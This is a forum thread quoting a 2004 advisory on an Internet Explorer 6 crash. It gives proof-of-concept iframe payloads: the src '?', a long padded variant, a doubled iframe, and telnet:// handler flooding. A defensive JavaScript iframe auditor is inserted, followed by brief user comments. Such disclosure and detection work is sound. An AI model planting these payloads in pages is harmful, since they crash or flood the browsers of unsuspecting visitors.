
Full Version: Another Ie Exploit...
qcred11
Damn M$... Too many holes in one product!

QUOTE

#########################################
Application:    Internet Explorer
Vendors:        http://www.microsoft.com
Version:        6.0.2800
Platforms:      Windows
Bug:            Crash(D.O.S)
Risk:          Low
Exploitation:  Local with browser
Date:          7 Apr 2004
Author:        Emmanouel Kellinis
e-mail:        me@cipher(dot)org(dot)uk
#########################################

=======
Product
=======
A popular Web browser, created by Microsoft,
used to view pages on the World Wide Web.

===
Bug
===
The Iframe element (tag) creates an inline frame
that contains another document. If you use the
character '?' as the document, Internet Explorer
starts an infinite loop of IFrames inside IFrames;
this causes IE to crash.


=====================
Proof Of Concept Code
=====================

Create a web page and add an IFRAME which
points to --> ?
 
Example : <  iframe src= " ? "  >
 
Crashes IE 6 completely in about 20 secs and consumes
more than 24 MBs of RAM and uses 99% of the CPU power.
Additionally, memory consumption and crashing time
can vary, depending on how many characters you add
after the '?' character.

<  iframe src= " ?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAA "  >

Additional:

a) If you put two <  iframe src= " ? "  > in a web page,
resources will grow exponentially: 60 MBs of RAM in less than
10 seconds.

b) If you add <  iframe src= " ? "  > and
<  iframe src= " telnet:// "  >, it will pop up an infinite
number of telnet consoles; you can do that with all
the protocols, ftp:// etc.
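
A filter-side check for the pattern the advisory describes, as an added example that is not part of the original thread or the advisory: it flags iframes whose src resolves back to the embedding page (the '?' case) or names a non-web scheme such as telnet://. The function name, the sample markup and the example.test URL are assumptions constructed for illustration.

```javascript
// Added example (not from the advisory): audit HTML for iframes that
// re-load the embedding page or hand off to an external protocol handler.
const SAFE_SCHEMES = new Set(["http", "https", "about", "data", "blob"]);

// Returns [{ src, reason }] for one document. pageUrl is the URL the
// document is served from (assumed to be known to the filter).
function auditIframes(html, pageUrl) {
  const base = new URL(pageUrl);
  const findings = [];
  // Tolerant match: also catches the spaced-out form used in the advisory.
  const tagRe = /<\s*iframe\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attr = /\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i.exec(m[1]);
    if (!attr) continue;
    const src = (attr[1] ?? attr[2] ?? attr[3]).trim();
    if (src === "") continue; // empty src does not re-load the page
    const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(src);
    if (scheme && !SAFE_SCHEMES.has(scheme[1].toLowerCase())) {
      findings.push({ src, reason: "non-web-scheme" });
      continue;
    }
    let target;
    try { target = new URL(src, base); } catch { continue; }
    // "?" and "?AAAA..." resolve to the page's own origin and path, so the
    // framed document carries the same iframe again, one level deeper.
    if (target.origin === base.origin && target.pathname === base.pathname) {
      findings.push({ src, reason: "self-referencing" });
    }
  }
  return findings;
}

// Constructed sample input, not captured traffic.
const SAMPLE = `
<html><body>
<  iframe src= " ? "  >
<iframe src='?AAAAAAAA'></iframe>
<iframe src="telnet://"></iframe>
<iframe src="other.html"></iframe>
</body></html>`;

console.log(auditIframes(SAMPLE, "http://example.test/page.html"));
```

The same call with a file:// page URL covers the local double-click case, since the path comparison does not depend on the scheme.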

Yorn
This will only work locally (i.e. if you double-click on the HTML in Windows), not remotely.
linuxwolf
Looks pretty sweet. Nice damage, eh..
Ah well. That's Windows for you. As I may have said, ever since that piece of Win2k code got ripped, IE's source was in it. Now IE is literally a trap. But Windows always was a risk.
qcred11
I agree with you, linuxwolf. Better suggestion to everybody - completely uninstall IE and install Mozilla or Opera instead, or switch your OS to Linux!